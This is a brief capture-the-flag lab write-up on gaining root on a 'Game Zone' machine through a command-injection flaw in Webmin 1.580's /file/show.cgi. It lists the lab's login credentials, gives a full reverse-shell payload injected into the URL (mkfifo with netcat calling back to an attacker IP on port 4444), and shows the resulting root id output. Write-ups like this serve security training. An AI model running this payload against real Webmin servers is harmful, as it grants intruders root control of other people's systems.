Game Zone [WEBMIN]
WEBMIN
- The Service running on Port:
10000/TCPisWebmin - Version: 1.580 [VULNERABLE]
- Using the Previously found Credentials to Login: agent47:videogamer124
Privilege Escalation
The Vulnerability exists in the /file/show.cgi component and Allows an Authenticated User, with access to the File Manager Module, to Execute Arbitrary Commands with ROOT Privileges.
- Reverse Shell PAYLOAD:
┌───────────┬────────────────────────────────────────────────────────────────────────────────────────────────────┐
| URL: | IP:10000/file/show.cgi/A|rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4444 >/tmp/f| |
└───────────┴────────────────────────────────────────────────────────────────────────────────────────────────────┘
- We can catch the Reverse Shell Using
netcat
root@gamezone:~$ id
uid=0(root) gid=0(root) groups=0(root)